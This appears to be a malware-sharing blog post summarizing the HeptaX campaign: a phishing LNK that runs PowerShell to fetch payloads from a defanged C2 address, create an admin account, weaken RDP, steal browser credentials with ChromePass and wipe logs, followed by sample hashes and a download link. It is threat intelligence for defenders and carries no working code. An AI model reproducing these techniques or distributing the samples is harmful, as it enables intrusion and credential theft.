Pages

Monday, October 28, 2024

2024-10-25 HeptaX - Unauthorized RDP Connections. Nalicious LNK. > Powershell > Bat files Samples




2024-10-25 Cyble: 
HeptaX: Unauthorized RDP Connections for Cyberespionage Operations

Summary:

  • The attack starts with a malicious LNK file delivered within a ZIP file, likely distributed through phishing emails, and seems to target the healthcare industry.
  • Upon execution, the LNK file initiates a PowerShell command that downloads multiple scripts and batch files from a remote server to establish persistence and control over the victim’s system.


    • The LNK file, once opened, triggers PowerShell commands that download additional payloads from hxxp://157.173.104[.]153.
    • These scripts enable the attacker to create a new user account with administrative privileges and alter RDP settings, reducing authentication requirements for easier unauthorized access.
    • A persistent shortcut (LNK) file is created in the Windows Startup folder to maintain access.
    • The primary PowerShell script communicates with the C2 server, constructing URLs with a unique identifier (UID) for the compromised machine to fetch commands or additional payloads.
    • If UAC is detected as weak or disabled, the attack proceeds with further stages that lower the system's security configurations.
    • A secondary payload, "ChromePass," is introduced, targeting Chromium-based browsers to harvest stored credentials, escalating the risk of compromised accounts.
    • Scripts configure the system to facilitate remote desktop access, enabling actions such as data exfiltration, monitoring, and installation of further malware.
    • Subsequent batch files (e.g., k1.bat, scheduler-once.bat) execute commands that hide traces, remove logs, and schedule tasks disguised as system operations to maintain persistence and evade detection.
    • The final stages involve the execution of a PowerShell script that performs reconnaissance, collects extensive system data, and sends it encoded to the C2 server.


Download
File Information
  •     ├── 18e75bababa1176ca1b25f727c0362e4bb31ffc19c17e2cabb6519e6ef9d2fe5 Google Chrome.lnk 
  •     ├── 1d82927ab19db7e9f418fe6b83cf61187d19830b9a7f58072eedfd9bdf628dab bb.ps1 
  •     ├── 4b127e7b83148bfbe56bd83e4b95b2a4fdb69e1c9fa4e0c021a3bfb7b02d8a16 ChromePass.exe 
  •     ├── 5ff89db10969cba73d1f539b12dad42c60314e580ce43d7b57b46a1f915a6a2b 202409 Resident Care Quality Improvement Strategies for Nursing Homes Enhancing Patient Satisfaction and Health Outcomes.pdf.lnk 
  •     ├── 6605178dbc4d84e789e435915e86a01c5735f34b7d18d626b2d8810456c4bc72.zip
  •     ├── 999f521ac605427945035a6d0cd0a0847f4a79413a4a7b738309795fd21d3432 k1.bat 
  •     └── a8d577bf773f753dfb6b95a3ef307f8b4d9ae17bf86b95dcbb6b2fb638a629b9 b.ps1 

Malware Repo Links
    Over the past 15 years, as the blog has been around, many hosting providers have dropped support due to stricter no-malware policies. This has led to broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), just note the file name from the URL and search for it in the Contagio Malware Storage.

No comments:

Post a Comment